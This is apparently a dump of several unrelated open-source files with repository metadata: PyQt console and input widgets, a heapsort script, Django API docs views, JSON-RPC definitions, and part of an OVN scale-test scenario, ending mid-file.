        # Add the command to history (even if it fails) and only keep the most recent 1000 entries
self.history.append(command)
self.history = self.history[-1000:]
self.historyPosition = 0
# Standard streams
import sys
old_stdout = sys.stdout
old_stderr = sys.stderr
sys.stdout = self.stdout
sys.stderr = self.stderr
# Evaluate/execute command and report results
try:
result = None
try:
self.resultWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
result = eval(command, self.environment, self.environment)
except SyntaxError:
exec (command, self.environment)
# Check if the evaluation was successful and if so report it in the results field
# Add the results to the environment
if result is not None:
message = str(result)
self.environment['_'] = message
self.echoCommand(message)
except:
# Get the traceback information and add the formatted output to the results field
import traceback, sys
exceptionType, exception, tb = sys.exc_info()
entries = traceback.extract_tb(tb)
entries.pop(0)
# Build and print a list containing the error report
lines = []
if entries:
lines += traceback.format_list(entries)
lines += traceback.format_exception_only(exceptionType, exception)
for line in lines:
self.echoCommand(line, format=self.errorTextFormat)
finally:
# Restore streams
sys.stdout = old_stdout
sys.stderr = old_stderr
self.resultWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
class _Stdout:
def __init__(self, resultWidget):
self.resultWidgetRef = weakref.ref(resultWidget)
self.stdoutTextFormat = QtGui.QTextCharFormat()
self.stdoutTextFormat.setFontWeight(QtGui.QFont.Normal)
def write(self, msg):
widget = self.resultWidgetRef()
if not widget: return
widget.textCursor().insertText(msg, self.stdoutTextFormat)
widget.textCursor().movePosition(QtGui.QTextCursor.End)
def flush(self):
pass
class _Stderr:
def __init__(self, resultWidget):
self.resultWidgetRef = weakref.ref(resultWidget)
self.errorTextFormat = QtGui.QTextCharFormat()
self.errorTextFormat.setForeground(QtGui.QColor(200, 40, 40))
self.errorTextFormat.setFontWeight(QtGui.QFont.Normal)
def write(self, msg):
widget = self.resultWidgetRef()
if not widget: return
widget.textCursor().insertText(msg, self.errorTextFormat)
widget.textCursor().movePosition(QtGui.QTextCursor.End)
def flush(self):
pass
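# A minimal usage sketch for PythonConsole, assuming a QApplication already exists when it
# is called; the commands are placeholders. Statements go through the exec branch and bare
# expressions through the eval branch of runCommand(), with results echoed to the output pane.
def _example_python_console_usage():
    console = PythonConsole()
    console.runCommand('x = 6 * 7')   # statement -> exec branch
    console.runCommand('x')           # expression -> eval branch, result is echoed
    return console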
class QfloatWidget(QtGui.QLineEdit):
    ''' Draggable spin box: ctrl + left, middle or right mouse button scrubs the value in the
    spinbox by increasingly large steps.
    '''
valueChanged = QtCore.Signal(list)
def __init__(self, parent=None):
super(QfloatWidget, self).__init__(parent)
# self.setDecimals(4)
# self.setButtonSymbols(QtGui.QAbstractSpinBox.NoButtons)
# self.setKeyboardTracking(False) # don't emit 3 times when typing 100
self.minstep = 0.001
self._dragging = False
self.setContextMenuPolicy(QtCore.Qt.PreventContextMenu) # no copy/paste menu to interfere with dragging
# catch the mouse events from the lineedit that is a child of the spinbox
# editor = self.findChild(QtGui.QLineEdit)
self.installEventFilter(self)
self.editingFinished.connect(functools.partial(self.handleEditingFinished))
# Initialise the current value
self.current_value = None
# Create a new Validator
# dblValidator = QtGui.QDoubleValidator(self)
dbl_validator = floatValidator(self)
self.setValidator(dbl_validator)
# Initialise the Range variables to nothing.
self.setRange()
def handleEditingFinished(self):
self.setValue(self.text())
def setValue(self, v):
v = float(v) # ensure it's a float!
if self.current_value == v: return
self.current_value = v
self.setText(str(v))
# if not self._dragging:
self.valueChanged.emit(v)
# Constrains the spin box to between two values
def setRange(self, min=None, max=None):
try:
self.validator().setRange(min, max)
# print ("Valid from {} to {}".format(str(self.validator().bottom()), str(self.validator().top())))
except:
print ("Inputs to QfloatWidget.setRange() are invalid with values {} and {}".format(min, max))
# Allows the box to be locked or unlocked
# Defaults to true so foo.setLocked() would lock "foo"
def setLocked(self, status=True):
assert isinstance(status, bool), "Lock value is not a boolean"
self.setReadOnly(status)
def value(self):
return float(self.text())
def text(self):
ret = super(QfloatWidget, self).text()
return ret
def eventFilter(self, obj, event):
if event.type() == QtGui.QMouseEvent.MouseButtonPress:
if not event.modifiers() & QtCore.Qt.ControlModifier:
return False
self.gpx, self.gpy = event.globalX(), event.globalY()
self.startX, self.startY = event.x(), event.y()
if event.button() & QtCore.Qt.LeftButton:
self._dragging = self.minstep
if event.button() & QtCore.Qt.MiddleButton:
self._dragging = self.minstep * 100
if event.button() & QtCore.Qt.RightButton:
self._dragging = self.minstep * 10000
return True
elif event.type() == QtGui.QMouseEvent.MouseButtonRelease:
if self._dragging is not False:
self._dragging = False
self.setValue(self.text())
else:
self._dragging = False
return True
elif event.type() == QtGui.QMouseEvent.MouseMove:
if self._dragging:
if not self.isReadOnly():
newValue = (self.value() + (event.x() - self.startX) * self._dragging)
if self.validator().bottom() is not None or self.validator().top() is not None:
newValue = np.clip(newValue, self.validator().bottom(), self.validator().top())
self.setValue(newValue)
QtGui.QCursor.setPos(self.gpx, self.gpy)
return True
return False
class QvectorWidget(QtGui.QWidget):
valueChanged = QtCore.Signal(list)
def __init__(self, size, parent=None):
super(QvectorWidget, self).__init__(parent)
self.vector = np.zeros(size, dtype=np.float32)
layout = QtGui.QHBoxLayout()
for vi in range(size):
w = QfloatWidget(self)
layout.addWidget(w)
w.valueChanged.connect(functools.partial(self.handleValueChanged, vi), QtCore.Qt.DirectConnection)
layout.setContentsMargins(0, 0, 0, 0)
self.blockSignals = False
self.setLayout(layout)
def handleValueChanged(self, vi, v):
self.vector[vi] = v
if not self.blockSignals:
self.valueChanged.emit(self.vector)
def setValue(self, v):
self.blockSignals = True
self.vector[:] = v
for vi, v in enumerate(self.vector):
self.layout().itemAt(vi).widget().setValue(v)
self.blockSignals = False
class QmatrixWidget(QtGui.QWidget):
valueChanged = QtCore.Signal(list)
'''
this should be replaced with qdatawidget mappers and a proper qt model of the retargetting
data structure
'''
def __init__(self, rows, cols, parent=None):
super(QmatrixWidget, self).__init__(parent)
self.rows = rows
self.cols = cols
self.matrix = np.zeros((rows, cols), dtype=np.float32)
self.blockSignals = False
layout = QtGui.QVBoxLayout()
for ri in range(rows):
row = QvectorWidget(cols, self)
row.valueChanged.connect(functools.partial(self.handleValueChanged, ri), QtCore.Qt.DirectConnection)
layout.addWidget(row)
layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(layout)
def handleValueChanged(self, ri, v):
self.matrix[ri, :] = v
if not self.blockSignals:
self.valueChanged.emit(self.matrix)
def setValue(self, v):
self.blockSignals = True
self.matrix[:, :] = v.copy()
for ri, rv in enumerate(self.matrix):
self.layout().itemAt(ri).widget().setValue(rv)
self.blockSignals = False
class QKeySequenceEdit(QtGui.QLineEdit):
''' line edit for capturing key sequences. use in a keyboard shortcut editor (although probably
better as labels on a button rather than a line edit'''
def __init__(self, *args):
super(QKeySequenceEdit, self).__init__(*args)
self.keySequence = None
def setKeySequence(self, keySequence):
self.keySequence = keySequence
self.setText(self.keySequence.toString(QtGui.QKeySequence.NativeText))
def keyPressEvent(self, event):
if event.type() == QtCore.QEvent.KeyPress:
key = event.key()
if key == QtCore.Qt.Key_unknown:
return
# just a modifier? Ctrl, Shift, Alt, Meta.
if key in [QtCore.Qt.Key_Control, QtCore.Qt.Key_Shift, QtCore.Qt.Key_Alt, QtCore.Qt.Key_Meta]:
# print("Single click of special key: Ctrl, Shift, Alt or Meta")
# print("New KeySequence:", QtGui.QKeySequence(key).toString(QtGui.QKeySequence.NativeText))
return
# check for a combination of user clicks
modifiers = event.modifiers()
if modifiers & QtCore.Qt.ShiftModifier: key += QtCore.Qt.SHIFT
if modifiers & QtCore.Qt.ControlModifier: key += QtCore.Qt.CTRL
if modifiers & QtCore.Qt.AltModifier: key += QtCore.Qt.ALT
if modifiers & QtCore.Qt.MetaModifier: key += QtCore.Qt.META
self.setKeySequence(QtGui.QKeySequence(key))
event.accept()
class intValidator(QtGui.QValidator):
def __init__(self, parent=None):
QtGui.QValidator.__init__(self, parent)
self.parent = parent
self.min_value = None
self.max_value = None
def setRange(self, min=None, max=None):
try:
self.min_value = None if min is None else int(min)
self.max_value = None if max is None else int(max)
except ValueError:
assert False, "Incorrect value types for floatValidator.setRange()"
def bottom(self):
return self.min_value
def top(self):
return self.max_value
def validate(self, text, length):
if len(text) == 0 or text == "-": return (QtGui.QValidator.Intermediate)
if self.parent.hasFocus():
try:
value = int(text)
except ValueError:
return (QtGui.QValidator.Invalid)
else:
try:
value = int(text)
except ValueError:
return (QtGui.QValidator.Invalid)
value = int(text)
if self.min_value is not None and value < self.min_value: return (QtGui.QValidator.Invalid)
if self.max_value is not None and value > self.max_value: return (QtGui.QValidator.Invalid)
return (QtGui.QValidator.Acceptable)
def fixup(self, input):
if input == "" or input == "-":
            self.parent.setText(str(self.min_value if self.min_value is not None else 0))
else:
if self.min_value is not None or self.max_value is not None:
value = np.clip(int(input), self.min_value, self.max_value)
self.parent.setText(str(value))
class floatValidator(QtGui.QValidator):
def __init__(self, parent=None):
from re import compile as re_compile
QtGui.QValidator.__init__(self, parent)
self.parent = parent
self.min_value = None
self.max_value = None
# RegExp for a valid number including scientific notation
        self._re = re_compile(r"^[-+]?[0-9]*\.?[0-9]*([eE][-+]?[0-9]*)?$")
def setRange(self, min=None, max=None):
try:
self.min_value = None if min is None else float(min)
self.max_value = None if max is None else float(max)
except ValueError:
assert False, "Incorrect value types for floatValidator.setRange()"
def bottom(self):
return self.min_value
def top(self):
return self.max_value
def validate(self, text, length):
if len(text) == 0: return (QtGui.QValidator.Intermediate)
if self.parent.hasFocus():
if not self._re.match(text):
return (QtGui.QValidator.Invalid)
else:
try:
value = float(text)
except ValueError:
return (QtGui.QValidator.Invalid)
if self.min_value is not None and value < self.min_value: return (QtGui.QValidator.Invalid)
if self.max_value is not None and value > self.max_value: return (QtGui.QValidator.Invalid)
return (QtGui.QValidator.Acceptable)
def fixup(self, input):
if input == "":
            self.parent.setText(str(self.min_value if self.min_value is not None else 0.0))
else:
try:
value = float(input)
            except ValueError:  # error from an incomplete scientific notation, e.g. "1.5e"
                input = input[:input.find("e")]
                value = float(input)
if self.min_value is not None or self.max_value is not None:
value = np.clip(value, self.min_value, self.max_value)
self.parent.setText(str(value))
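# Illustrative usage sketch (not part of the original module): a QfloatWidget
# constrained to [0.0, 1.0] by the floatValidator above. Widgets need a running
# QApplication, so this is left as comments only.
#   w = QfloatWidget()
#   w.setRange(0.0, 1.0)
#   w.valueChanged.connect(print)
#   w.setValue(0.25)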
if __name__ == '__main__':
import sys
# from UI import QAppCtx
app = QtGui.QApplication(sys.argv)
app.setStyle('plastique')
# with QAppCtx():
# dialog = QmatrixWidget(3,4,None)
# def p(*x): print (x)
# dialog.valueChanged.connect(p)
# dialog.setValue(np.eye(3,4))
# dialog.show()
# def modeSelectCB(mode,val):
# print (mode,val)
# options = ['orig','proj','proj_freeze','synth','diff']
# win = Qselect(options = options, default = 'diff', cb = modeSelectCB)
# win.show()
listWidget = QOrderedListWidget(['Hello', 'World', 'this', 'is', 'a', 'test'])
listWidget.setStyleSheet("border:0;")
listWidget.show()
def testCB(*x): print ("Value is: {}".format(x))
slideWidgetHolder = QtGui.QGroupBox()
slideWidget = QslideLimitValue("Test Slider", 0, -180, 180, testCB, "Slider")
# layout = QtGui.QHBoxLayout()
# layout.setContentsMargins(0,0,0,0)
# layout.addWidget(slideWidget.slider)
# layout.addWidget(slideWidget.display)
slideWidgetHolder.setLayout(slideWidget)
slideWidgetHolder.show()
slideWidget2 = QslideLimitControl()
slideWidget2.show()
app.connect(app, QtCore.SIGNAL('lastWindowClosed()'), app.quit)
sys.exit(app.exec_())
|
mit
| -1,527,965,147,184,060,700
| 32.641414
| 135
| 0.714495
| false
| 3.113344
| false
| false
| false
|
samueljackson92/scripts
|
python/heapsort.py
|
1
|
1562
|
# heapsort.py
# Date: 15/06/13
# Author: Samuel Jackson (samueljackson@outlook.com)
# Description: Python implementation of a basic heapsort.
# Based heavily on the example code from http://en.wikipedia.org/wiki/Heapsort
import random
def swap(data, i, j):
temp = data[i]
data[i] = data[j]
data[j] = temp
#convert our data into a max-order heap in place in the array
def heapify(data):
#get position of last parent node in heap
start = (len(data) -1) / 2
while (start >= 0):
#sift down from start such that all nodes below start are then in place
siftDown(data, start, len(data)-1)
start = start -1
#Re-organize the heap from a given point in the list to a given end point
def siftDown(data, start, end):
root = start
#while root has at least one child
while (root * 2 + 1 <= end):
child = root * 2 + 1 #get left child
swapNode = root #keep track of node to swap with
#check if left child needs to be swapped
if(data[swapNode] < data[child]):
swapNode = child
#check if right child exists and needs to be swapped
if(child+1 <= end and data[swapNode] < data[child+1]):
swapNode = child+1
#check if we need to swap
if(swapNode != root):
swap(data, root, swapNode)
root = swapNode
else:
return
def heap_sort(data):
end = len(data) -1
#place data in max heap order
heapify(data)
while (end > 0):
#swap the max element to the end
print ">>", data
swap(data, 0, end)
end = end -1
#re-heapify the data
siftDown(data, 0, end)
d = random.sample(range(30), 10)
print d
heap_sort(d)
print d
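# Illustrative sanity check (not part of the original script): the list should now
# be in non-decreasing order.
assert all(d[i] <= d[i + 1] for i in range(len(d) - 1)), "heap_sort failed"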
|
mit
| -2,002,207,885,747,726,000
| 21.014085
| 78
| 0.677977
| false
| 2.897959
| false
| false
| false
|
DemocracyClub/yournextrepresentative
|
ynr/apps/api/views.py
|
1
|
2639
|
from collections import OrderedDict
from django.views.generic import TemplateView
from rest_framework.request import Request
from drf_yasg import openapi
from drf_yasg.generators import OpenAPISchemaGenerator
from elections.models import Election
class OpenAPISchemaMixin:
version = None
patterns = None
def _sort_ordered_dict_by_keys(self, od):
keys = sorted(list(od.keys()))
new_od = OrderedDict()
for key in keys:
if type(od[key]) == OrderedDict:
od[key] = self._sort_ordered_dict_by_keys(od[key])
new_od[key] = od[key]
return new_od
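    # Illustrative behaviour (not part of the original): sorting
    # OrderedDict([("b", 1), ("a", OrderedDict([("d", 2), ("c", 3)]))]) with the
    # method above yields
    # OrderedDict([("a", OrderedDict([("c", 3), ("d", 2)])), ("b", 1)]).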
def get_schema(self):
schema = OpenAPISchemaGenerator(
openapi.Info(
title="Snippets API",
default_version="self.version",
description="Test description",
terms_of_service="https://www.google.com/policies/terms/",
contact=openapi.Contact(email="hello@democracyclub.org.uk"),
license=openapi.License(name="BSD License"),
),
patterns=self.patterns,
version="next",
)
request = Request(self.request)
schema_obj = schema.get_schema(request=request, public=True)
return self._sort_ordered_dict_by_keys(schema_obj)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["schema"] = self.get_schema()
context["version"] = self.version
return context
class NextAPIDocsView(OpenAPISchemaMixin, TemplateView):
template_name = "api/next_home.html"
class APIDocsEndpointsView(OpenAPISchemaMixin, TemplateView):
template_name = "api/endpoints.html"
class APIDocsDefinitionsView(OpenAPISchemaMixin, TemplateView):
template_name = "api/definitions.html"
patterns = None
version = "next"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["schema"] = self.get_schema()
return context
class CSVListView(TemplateView):
template_name = "api/csv_list.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
base_qs = Election.objects.all().order_by(
"current", "-election_date", "slug"
)
context["current_elections"] = base_qs.current()
context["future_elections"] = base_qs.future().exclude(current=True)
context["past_elections"] = base_qs.past().exclude(current=True)
return context
class ResultsDocs(TemplateView):
template_name = "api/results.html"
|
agpl-3.0
| -4,075,647,256,769,377,000
| 29.686047
| 76
| 0.63471
| false
| 3.835756
| false
| false
| false
|
seprich/py-bson-rpc
|
bsonrpc/definitions.py
|
1
|
4837
|
# -*- coding: utf-8 -*-
'''
Definitions to match messages to JSON RPC 2.0 schema and to produce them.
Also RPC error definitions.
'''
import six
from bsonrpc.exceptions import (
InternalError, InvalidParams, InvalidRequest, MethodNotFound,
ParseError, ServerError, UnspecifiedPeerError)
from bsonrpc.options import NoArgumentsPresentation
__license__ = 'http://mozilla.org/MPL/2.0/'
class Definitions(object):
def __init__(self, protocol, protocol_version, no_args):
self.protocol = protocol
self.protocol_version = protocol_version
self._no_args = no_args # Strategy to represent no args
def _set_params(self, msg, args, kwargs):
if not args and not kwargs:
if self._no_args == NoArgumentsPresentation.EMPTY_ARRAY:
msg['params'] = []
if self._no_args == NoArgumentsPresentation.EMPTY_OBJECT:
msg['params'] = {}
return msg
if args:
msg['params'] = args
else:
msg['params'] = kwargs
return msg
def request(self, msg_id, method_name, args, kwargs):
msg = {
self.protocol: self.protocol_version,
'id': msg_id,
'method': method_name,
}
msg = self._set_params(msg, args, kwargs)
return msg
def notification(self, method_name, args, kwargs):
msg = {
self.protocol: self.protocol_version,
'method': method_name,
}
msg = self._set_params(msg, args, kwargs)
return msg
def ok_response(self, msg_id, result):
return {
self.protocol: self.protocol_version,
'id': msg_id,
'result': result
}
def error_response(self, msg_id, error, details=None):
msg = {
self.protocol: self.protocol_version,
'id': msg_id,
'error': error
}
if details:
msg['error']['data'] = details
return msg
def _chk_protocol(self, msg):
return msg.get(self.protocol, None) == self.protocol_version
def _has_method(self, msg):
return isinstance(msg.get('method', None), six.string_types)
def _valid_params(self, msg):
return ('params' not in msg or isinstance(msg['params'], (list, dict)))
def is_request(self, msg):
return (self._chk_protocol(msg) and
self._has_method(msg) and
'id' in msg and
(msg['id'] is None or
isinstance(msg['id'], (six.string_types, int))) and
self._valid_params(msg))
def is_notification(self, msg):
return (self._chk_protocol(msg) and
self._has_method(msg) and
'id' not in msg and
self._valid_params(msg))
def is_response(self, msg):
result_and_no_error = 'result' in msg and 'error' not in msg
error_and_no_result = 'error' in msg and 'result' not in msg
return (self._chk_protocol(msg) and
isinstance(msg.get('id', None), (six.string_types, int)) and
(result_and_no_error or error_and_no_result))
def is_nil_id_error_response(self, msg):
error_and_no_result = 'error' in msg and 'result' not in msg
return (self._chk_protocol(msg) and
error_and_no_result and
'id' in msg and
msg['id'] is None)
def is_batch_request(self, msg_list):
if not msg_list:
return False
for msg in msg_list:
if not self.is_request(msg) and not self.is_notification(msg):
return False
return True
def is_batch_response(self, msg_list):
if not msg_list:
return False
for msg in msg_list:
if not self.is_response(msg):
return False
return True
class RpcErrors(object):
parse_error = {'code': -32700, 'message': 'Parse error'}
invalid_request = {'code': -32600, 'message': 'Invalid Request'}
method_not_found = {'code': -32601, 'message': 'Method not found'}
invalid_params = {'code': -32602, 'message': 'Invalid params'}
internal_error = {'code': -32603, 'message': 'Internal error'}
server_error = {'code': -32000, 'message': 'Server error'}
_promote = {
-32700: ParseError,
-32600: InvalidRequest,
-32601: MethodNotFound,
-32602: InvalidParams,
-32603: InternalError,
-32000: ServerError,
}
@classmethod
def error_to_exception(cls, error):
code = error.get('code', 0)
message = error.get('message', '')
data = error.get('data', '')
exception_cls = cls._promote.get(code, UnspecifiedPeerError)
return exception_cls(code, message, data)
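if __name__ == '__main__':
    # Illustrative usage sketch, not part of the original module; the protocol
    # key/version strings and the no-arguments strategy are assumptions chosen to
    # satisfy the checks implemented above.
    defs = Definitions('jsonrpc', '2.0', NoArgumentsPresentation.EMPTY_ARRAY)
    req = defs.request('msg-1', 'sum', [1, 2, 3], {})
    # -> {'jsonrpc': '2.0', 'id': 'msg-1', 'method': 'sum', 'params': [1, 2, 3]}
    assert defs.is_request(req)
    resp = defs.ok_response('msg-1', 6)
    assert defs.is_response(resp)
    # Map a protocol-level error object back to its exception class.
    exc = RpcErrors.error_to_exception(RpcErrors.method_not_found)
    print(type(exc).__name__)  # MethodNotFound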
|
mpl-2.0
| 1,107,113,176,544,598,700
| 31.682432
| 79
| 0.565226
| false
| 3.882022
| false
| false
| false
|
openvswitch/ovn-scale-test
|
rally_ovs/plugins/ovs/scenarios/ovn.py
|
1
|
25304
|
# Copyright 2016 Ebay Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from rally_ovs.plugins.ovs import scenario
from rally.task import atomic
from rally.common import logging
from rally.common.i18n import _  # assumed path for the _() marker used below, which was never imported
from rally import exceptions
from rally_ovs.plugins.ovs import ovnclients
from rally_ovs.plugins.ovs import utils
import random
import netaddr
from io import StringIO
LOG = logging.getLogger(__name__)
class OvnScenario(ovnclients.OvnClientMixin, scenario.OvsScenario):
RESOURCE_NAME_FORMAT = "lswitch_XXXXXX_XXXXXX"
def __init__(self, context=None):
super(OvnScenario, self).__init__(context)
self._init_conns(self.context)
def _init_conns(self, context):
self._ssh_conns = {}
if not context:
return
for sandbox in context["sandboxes"]:
sb_name = sandbox["name"]
farm = sandbox["farm"]
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
ovs_ssh.set_sandbox(sb_name, self.install_method,
sandbox["host_container"])
ovs_ssh.enable_batch_mode()
self._ssh_conns[sb_name] = ovs_ssh
def _get_conn(self, sb_name):
return self._ssh_conns[sb_name]
def _flush_conns(self, cmds=[]):
for _, ovs_ssh in self._ssh_conns.items():
for cmd in cmds:
ovs_ssh.run(cmd)
ovs_ssh.flush()
'''
return: [{"name": "lswitch_xxxx_xxxxx", "cidr": netaddr.IPNetwork}, ...]
'''
@atomic.action_timer("ovn.create_lswitch")
def _create_lswitches(self, lswitch_create_args, num_switches=-1):
print("create lswitch")
return super(OvnScenario, self)._create_lswitches(lswitch_create_args, num_switches)
@atomic.optional_action_timer("ovn.list_lswitch")
def _list_lswitches(self):
print("list lswitch")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
return ovn_nbctl.lswitch_list()
@atomic.action_timer("ovn.delete_lswitch")
def _delete_lswitch(self, lswitches):
print("delete lswitch")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lswitch in lswitches:
ovn_nbctl.lswitch_del(lswitch["name"])
ovn_nbctl.flush()
def _get_or_create_lswitch(self, lswitch_create_args=None):
pass
@atomic.action_timer("ovn.create_lport")
    def _create_lports(self, lswitch, lport_create_args={}, lport_amount=1,
                       lport_ip_shift=1):
LOG.info("create %d lports on lswitch %s" % \
(lport_amount, lswitch["name"]))
self.RESOURCE_NAME_FORMAT = "lpXXXXXX_XXXXXX"
batch = lport_create_args.get("batch", lport_amount)
port_security = lport_create_args.get("port_security", True)
LOG.info("Create lports method: %s" % self.install_method)
network_cidr = lswitch.get("cidr", None)
ip_addrs = None
if network_cidr:
end_ip = network_cidr.ip + lport_amount + lport_ip_shift
if not end_ip in network_cidr:
message = _("Network %s's size is not big enough for %d lports.")
raise exceptions.InvalidConfigException(
message % (network_cidr, lport_amount))
ip_addrs = netaddr.iter_iprange(network_cidr.ip + lport_ip_shift,
network_cidr.last)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
base_mac = [i[:2] for i in self.task["uuid"].split('-')]
base_mac[0] = str(hex(int(base_mac[0], 16) & 254))
base_mac[3:] = ['00']*3
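        # (Illustrative note, not in the original: masking the first octet with 254
        # clears its least-significant bit, the multicast bit, so generated MACs
        # stay unicast; the last three octets are zeroed here and presumably
        # randomised per port by utils.get_random_mac() below.)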
flush_count = batch
lports = []
for i in range(lport_amount):
ip = str(next(ip_addrs)) if ip_addrs else ""
if len(ip):
name = "lp_%s" % ip
else:
name = self.generate_random_name()
mac = utils.get_random_mac(base_mac)
ip_mask = '{}/{}'.format(ip, network_cidr.prefixlen)
lport = ovn_nbctl.lswitch_port_add(lswitch["name"], name, mac,
ip_mask)
ovn_nbctl.lport_set_addresses(name, [mac, ip])
if port_security:
ovn_nbctl.lport_set_port_security(name, mac)
lports.append(lport)
flush_count -= 1
if flush_count < 1:
ovn_nbctl.flush()
flush_count = batch
ovn_nbctl.flush() # ensure all commands be run
ovn_nbctl.enable_batch_mode(False)
return lports
@atomic.action_timer("ovn.delete_lport")
def _delete_lport(self, lports):
print("delete lport")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lport in lports:
ovn_nbctl.lport_del(lport["name"])
ovn_nbctl.flush()
@atomic.action_timer("ovn.list_lports")
def _list_lports(self, lswitches):
print("list lports")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lswitch in lswitches:
LOG.info("list lports on lswitch %s" % lswitch["name"])
ovn_nbctl.lport_list(lswitch["name"])
@atomic.optional_action_timer("ovn.create_acl")
def _create_acl(self, lswitch, lports, acl_create_args, acls_per_port):
sw = lswitch["name"]
LOG.info("create %d ACLs on lswitch %s" % (acls_per_port, sw))
direction = acl_create_args.get("direction", "to-lport")
priority = acl_create_args.get("priority", 1000)
action = acl_create_args.get("action", "allow")
address_set = acl_create_args.get("address_set", "")
'''
match template: {
"direction" : "<inport/outport>",
"lport" : "<swicth port>",
"address_set" : "<address_set id>"
"l4_port" : "<l4 port number>",
}
'''
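        # Illustrative example (not from the original): with the default template and
        # direction "to-lport", a rendered match could look like:
        #   outport == lp_192.168.0.5 && ip4 && udp && udp.src == 100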
match_template = acl_create_args.get("match",
"%(direction)s == %(lport)s && \
ip4 && udp && udp.src == %(l4_port)s")
if direction == "from-lport":
p = "inport"
else:
p = "outport"
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lport in lports:
for i in range(acls_per_port):
match = match_template % { 'direction' : p,
'lport' : lport["name"],
'address_set' : address_set,
'l4_port' : 100 + i }
ovn_nbctl.acl_add(sw, direction, priority, match, action)
ovn_nbctl.flush()
@atomic.action_timer("ovn.list_acl")
def _list_acl(self, lswitches):
LOG.info("list ACLs")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lswitch in lswitches:
LOG.info("list ACLs on lswitch %s" % lswitch["name"])
ovn_nbctl.acl_list(lswitch["name"])
@atomic.action_timer("ovn.delete_all_acls")
def _delete_all_acls_in_lswitches(self, lswitches):
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(True)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lswitch in lswitches:
self._delete_acls(lswitch)
ovn_nbctl.flush()
def _delete_acls(self, lswitch, direction=None, priority=None,
match=None, flush=False):
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
LOG.info("delete ACLs on lswitch %s" % lswitch["name"])
ovn_nbctl.acl_del(lswitch["name"], direction, priority, match)
if flush:
ovn_nbctl.flush()
@atomic.action_timer("ovn_network.create_routers")
def _create_routers(self, router_create_args):
LOG.info("Create Logical routers")
return super(OvnScenario, self)._create_routers(router_create_args)
@atomic.action_timer("ovn_network.delete_routers")
def _delete_routers(self):
LOG.info("Delete Logical routers")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lrouter in ovn_nbctl.lrouter_list():
ovn_nbctl.lrouter_del(lrouter["name"])
@atomic.action_timer("ovn_network.connect_network_to_router")
def _connect_networks_to_routers(self, lnetworks, lrouters, networks_per_router):
super(OvnScenario, self)._connect_networks_to_routers(lnetworks,
lrouters,
networks_per_router)
@atomic.action_timer("ovn_network.create_phynet")
def _create_phynet(self, lswitches, physnet, batch):
LOG.info("Create phynet method: %s" % self.install_method)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
flush_count = batch
for lswitch in lswitches:
network = lswitch["name"]
port = "provnet-%s" % network
ovn_nbctl.lswitch_port_add(network, port)
ovn_nbctl.lport_set_addresses(port, ["unknown"])
ovn_nbctl.lport_set_type(port, "localnet")
ovn_nbctl.lport_set_options(port, "network_name=%s" % physnet)
flush_count -= 1
if flush_count < 1:
ovn_nbctl.flush()
flush_count = batch
ovn_nbctl.flush()
    # NOTE(huikang): num_networks overrides the "amount" in network_create_args
def _create_networks(self, network_create_args, num_networks=-1):
physnet = network_create_args.get("physical_network", None)
lswitches = self._create_lswitches(network_create_args, num_networks)
batch = network_create_args.get("batch", len(lswitches))
if physnet != None:
self._create_phynet(lswitches, physnet, batch)
return lswitches
def _bind_ports_and_wait(self, lports, sandboxes, port_bind_args):
